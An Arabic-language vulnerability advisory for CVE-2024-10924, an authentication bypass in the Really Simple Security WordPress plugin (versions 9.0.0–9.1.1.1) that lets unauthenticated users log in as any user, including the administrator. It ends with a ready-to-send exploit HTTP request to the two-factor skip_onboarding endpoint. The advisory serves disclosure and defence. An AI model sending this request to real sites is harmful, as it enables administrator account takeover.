
Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – تجاوز المصادقة
إضافات Really Simple Security (النسخ المجانية والمحترفة والمحترفة متعددة المواقع) لووردبريس معرضة لتجاوز المصادقة في الإصدارات 9.0.0 إلى 9.1.1.1. السبب هو معالجة غير صحيحة للتحقق من المستخدم في إجراءات REST API للتحقق ذي العاملين باستخدام الدالة check_login_and_get_user. يتيح ذلك للمهاجمين غير الموثقين تسجيل الدخول كأي مستخدم موجود في الموقع، مثل مسؤول، عندما يكون إعداد "المصادقة ذات العاملين" مفعّلاً (معطل افتراضياً).
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE CVE-2024-10924
CVSS 9.8 (Critical)
Publicly Published November 14, 2024
Last Updated November 14, 2024
Researcher István Márton - Wordfence
POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;
Connection: keep-alive
Content-Length: 90
{
"user_id":1,
"login_nonce": "231231231",
"redirect_to": "/wp-admin/"
}